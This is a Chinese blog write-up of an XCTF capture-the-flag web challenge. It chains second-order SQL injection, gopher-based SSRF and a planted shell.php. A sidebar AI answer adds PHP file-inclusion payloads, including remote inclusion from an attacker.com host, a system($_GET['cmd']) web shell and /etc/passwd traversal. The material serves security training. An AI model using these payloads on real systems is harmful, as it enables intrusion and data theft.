【xctf之Background_Management_System】

最新推荐文章于 2025-08-05 23:58:52 发布
原创 最新推荐文章于 2025-08-05 23:58:52 发布 · 461 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

本文讲述了在XCTF比赛中遇到的背景管理系统中,通过ThinkPHP框架发现的漏洞利用过程,包括注册时的二次注入,日志中的密码验证,SSRF漏洞的触发,以及最终的编码问题解决。作者详细介绍了从目录扫描、源码分析到获取flag的全过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

xctf之Background_Management_System

在这里插入图片描述
在这里插入图片描述
打开网址,主页如上。
发现存在用户注册以及登录功能。
在这里插入图片描述
如果熟悉thinkphp的同学,就会看出,这道题用的就是thinkphp框架,其中可能会存在二次开发的代码。👀

在这里插入图片描述
在这里插入图片描述
在个人信息处,发下提示admin用户,才可以有信息提示。

在这里插入图片描述

万事不绝,先扫为敬。目录扫描后,发现存在一个www.zip,不用说这肯定是源码。先下载下来看下。
在这里插入图片描述
这一看就是thinkphp。。有一说一,对待这种框架,我就没想过一开始就搞代码审计,对待这种比较成熟的框架,我觉得还是翻一翻配置文件或者日志。
在这里插入图片描述
在日志文件中,找到的用户密码全部尝试了,都没用。但是发现一个奇怪的地方,登录用户admin’#。再看下其它的日志文件。

在这里插入图片描述
看着日志文件,我咋看,咋觉得这个存在二次注入漏洞呢。
看下源码。
在这里插入图片描述
看到注册功能源码,发现username字段处并没有过滤 ’以及# 。过滤的基本就是一些sql函数以及=之类的。
我们再看下个人信息处的修改密码功能。
在这里插入图片描述
密码修改的功能,我们发现此处的username过滤情况和注册处的一致,也就是说只要在注册的时候,admin’#如果可以注册成功,就可以成功的

这个时候我们就可以利用二次注入进行修改admin用户的账号了

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功获取到admin用户的信息,发现下面提示了一个页面。

在这里插入图片描述
感觉好像是存在ssrf漏洞。

在这里插入图片描述
使用http协议访问,提示如下:
在这里插入图片描述
使用burp爆破下协议。
在这里插入图片描述
发现,gopher好像可以。
在这里插入图片描述
已知,在public文件夹下存在shell.php文件。
在这里插入图片描述
在这里插入图片描述
发现shell.php可以执行。
在这里插入图片描述
ls /发现无法执行,ls后的要加的是+。
在这里插入图片描述
发现/flag文件。
在这里插入图片描述
在这里插入图片描述
成功获取到flag。

总结

这道题结合sql二次注入,ssrf漏洞,伪协议访问,以及最后的符号编码问题,总体来讲难度,中等。尤其是最后的编码问题,?需要二次url编码,空格被过滤,需要使用+进行连接,并且需要+进行编码。

参考链接

官方writeup:https://adworld.xctf.org.cn/challenges/write-up?hash=0b1a9c16-517e-4059-b754-ac2c7d546527_2

攻防世界 web高手进阶区 10分题 Background_Management_System
闵行小鱼塘
10-21 1152
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
攻防世界--Background_Management_System
qq_46263951的博客
01-09 1649
先看提示 这里有一个登陆和一个注册,尝试注册admin显示已经存在,猜测SQL注入,发现这里有WAF无法绕过,先注册进去看看 提示只有admin才会给hints 扫下目录 www.zip源码泄漏,这里发现shell.php但是目前还无法利用 代码审阅 限制了 Login和Register都对可控参数做了转义,无法利用 Userinfo中没有限制,所以可以利用修改密码改实现越权 $sql = "UPDATE users SET PASSWORD='$pass' where userna...
XCTF-Background_Management_System
2201_75955146的博客
12-29 525
话不多说,开干这题主要考了二次注入和SSRF的内容,中间存在很多过滤,是一道中等难度的题,认真做的话对学习还是有很大用的。
攻防世界 WEB Background_Management_System
qq_41696858的博客
10-08 443
上一题smarty靶场好像有点问题,shell传上去连不上去,包括这一题好像也比原题少了些东西 先看看吧,这一题,老问题,注册,登录,发现没漏洞,扫目录,发现www.zip 源码审计,在application/index/controller/里面的UserInfo里面发现问题 $sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; 前面注册登录页面都对转义字符做了过
Background-management-system-architecture:后台管理系统架构(react和vue)个人总结及基础代码
03-11
前言 最近做成一套后台管理系统,参考的是饿了么大神的 ,自己跟着撸一遍之后突然想比对一下react和vue在后台管理系统的方案以及架构,于是有了此项目。 参考 简介 本项目集合vue + vuex + vue-router + element-ui,react + react-router-dom + redux + antd-design(分别用比较火的两个脚手架create-react-app和Ant蚁金服的react轻量级框架dva)着重想介绍后台管理系统中的权限管理,网络请求,状态机,缓存,组件的写法,打包上线,优化以及在内置一个后台系统中可能会遇到的杂七杂八的问题,希望读者能够少走弯路。 (本文档将持续更新...) 注意 本项目的代码只是作为参考,真正想搭自定义的框架请使用脚手架一步步来,这样才会学得更多 vue部分 项目建造和必装的插件 使用的命令vue init webpac
攻防世界-XCTF-Web安全最佳刷题路线
ailx10
06-05 932
摘要:本文分享XCTF Web安全刷题路线,由网络安全专家ailx10整理。题目按难度分为5个等级:1级包含robots.txt、HTTP请求等基础题;2级涉及SQL注入、命令执行;3级为PHP反序列化、文件包含等进阶内容;4级包含模版注入、SSRF等复杂漏洞;5级是最高难度,涉及多种漏洞组合利用。文章强调CTF需专精某个领域,同时提供了详细的刷题指南,适合不同阶段的Web安全学习者参考。
[ 网络安全] MBAK (网站备份文件爆破工具) v1.0.0 与 MSSRF (SSRF漏洞利用)工具 组合拳
04-09 613
MBAK (网站备份文件爆破工具) v1.0.0 与 MSSRF (SSRF漏洞利用)工具
攻防世界-web题型-8星难度汇总-个人wp
dreamer292的博客
08-24 1270
攻防世界web题型8星难度
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 403
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 306
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 137
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Python包安全工程实践:构建安全可靠的Python生态系统
最新发布
Programming Talk
08-05 163
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 912
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
安全扫描:目标主机支持RSA密钥交换问题
weixin_50859396的博客
08-04 529
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
DDoS 防护的未来趋势AI 如何改变安全行业
2301_78078966的博客
08-05 662
​:AI正在重塑DDoS攻防的底层逻辑——攻击者利用AI实现攻击自动化与隐蔽化,防御者则通过AI驱动的动态响应与预测能力重建安全防线。未来安全行业的竞争,本质是AI技术迭代速度与攻防对抗深度的较量。
BeeWorks私有化即时通讯,局域网办公安全可控
weixin_53855915的博客
08-05 302
数据安全不可控:公共云IM 的消息存储与传输依赖外部服务器,即使在局域网内使用,部分数据仍可能通过云端同步 “外泄”,对于涉及生产图纸、科研数据、涉密文件的沟通而言,风险不可接受。操作审计追溯:所有权限变更、消息删除、文件下载等操作均生成日志,存储在局域网审计服务器中,支持按时间、用户、操作类型检索,满足“可追溯、可问责” 需求。权限管理僵化:局域网内组织架构复杂(如工厂的车间、班组层级),公共云IM 的标准化权限体系无法适配 “部门隔离”“跨层级禁言” 等精细化需求。
OAuth 2.0 的安全升级版授权协议 OAuth 2.1 详解
路多辛的所思所想
08-02 690
OAuth 2.1 是对 OAuth 2.0 协议的一次重大更新,废弃了不安全的用法,整合了最新的安全实践,从而提高了协议的安全性和易用性。虽然“OAuth 2.1”从名称上看起来像是一个全新的版本,但实际上并非对 OAuth 2.0 的彻底的颠覆,其实是 OAuth 2.0 的最佳实践集合,整合了多年来社区反馈的最佳使用方式并做了必要的安全性改进。
SELinux加固Linux安全
m0_66276901的博客
08-05 439
SELinux访问控制规则。在强制模式下,如果规则没有明确允许访问,则拒绝访问,并写入日志。此模式是默认模式。:SELinux 加载策略并处于活动状态,但访问控制规则,。此模式有助于对应用和规则进行测试和故障排除。:完全。不拒绝任何SELinux违规,不予记录。Enforcing#permission是临时关闭用来测试是不是selinux引起的原因PermissiveEnforcing​***关闭要编辑配置文件完成***selinux是内核级别功能。
安全专家发现利用多层跳转技术窃取Microsoft 365登录凭证的新型钓鱼攻击
FreeBuf_的博客
08-01 498
黑客滥用合法服务多层跳转窃取Microsoft 365凭证,钓鱼攻击再升级。
xctf web_php_include
03-29
<think>好的,用户需要了解XCTF竞赛中与PHP include相关的Web安全漏洞的解题思路。首先,我应该回忆PHP中的文件包含漏洞,尤其是include函数的不当使用可能导致的安全问题。用户提到的引用[4]中的代码显示,$lan变量直接来自Cookie中的language值,然后拼接.php后缀进行包含。这种情况下,如果没有严格的过滤,攻击者可能通过修改Cookie来包含任意文件,比如利用路径遍历或者远程文件包含。 接下来,我需要考虑常见的利用方法。例如,路径遍历攻击,用户可能构造类似../../etc/passwd的payload来读取系统文件。此外,如果服务器配置允许远程包含(allow_url_include为On),攻击者可以包含恶意服务器上的文件执行代码。引用[3]的PHP类型比较文档可能帮助理解变量处理,但这里更关键的是文件包含漏洞。 然后,解题步骤可能包括:检查代码中是否存在未过滤的用户输入,尝试包含敏感文件如/etc/passwd,或者上传恶意文件并通过包含执行。例如,在引用[4]的情况中,设置Cookie的language为../../../tmp/uploaded_file,如果存在上传临时文件的话。还可能利用PHP伪协议,如php://filter来读取源码,比如?lan=php://filter/convert.base64-encode/resource=config,这样可以获取base64编码后的文件内容。 同时,需要注意引用[2]中提到的情况,通过文件包含读取admin.php或function.php的源码,这可能泄露关键信息。此外,确保回答中引用了正确的来源,比如引用[4]的代码示例,说明如何利用Cookie进行文件包含。 最后,生成相关问题时要覆盖漏洞原理、利用方式、防御措施和CTF中的其他常见漏洞,帮助用户全面理解。需要确保回答结构清晰,步骤详细,并且引用正确,比如在关键点后添加[^4]或[^2]。</think>### XCTF PHP include Web安全漏洞解题思路 在CTF竞赛中,PHP的`include`函数常因未正确过滤用户输入导致文件包含漏洞。以下是基于引用[4]的代码分析及典型解题方法: --- #### **漏洞原理** 1. **关键代码片段** 通过Cookie中的`language`参数动态包含文件: ```php $lan = $_COOKIE['language']; @include($lan.".php"); ``` 若未对`$lan`进行过滤,攻击者可通过路径遍历(如`../../../etc/passwd`)或PHP伪协议(如`php://filter`)读取任意文件[^4]。 2. **漏洞利用条件** - 目标服务器开启`allow_url_include`(远程文件包含) - 文件路径可控且未限制文件后缀 --- #### **解题步骤** 1. **探测漏洞** - 修改Cookie中`language`值为`../../../../etc/passwd%00`,尝试读取系统文件(需PHP版本<5.3.4,因空字节截断漏洞)[^4]。 2. **利用PHP伪协议** - **读取源码**:构造Payload为`php://filter/convert.base64-encode/resource=index`,通过Base64解码获取源码: ```http Cookie: language=php://filter/convert.base64-encode/resource=index ``` - **远程代码执行**:若允许远程包含,设置`language=http://attacker.com/shell.txt`,触发恶意代码执行。 3. **结合文件上传** - 若存在文件上传功能,上传含恶意代码的图片(如`<?php system($_GET['cmd']);?>`),通过包含临时文件路径实现RCE: ```http Cookie: language=../../../tmp/uploaded_file ``` --- #### **防御措施** 1. 白名单限制包含路径(如只允许包含`en/`或`zh/`目录) 2. 使用`basename()`函数过滤路径中的特殊字符 3. 关闭`allow_url_include`配置 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值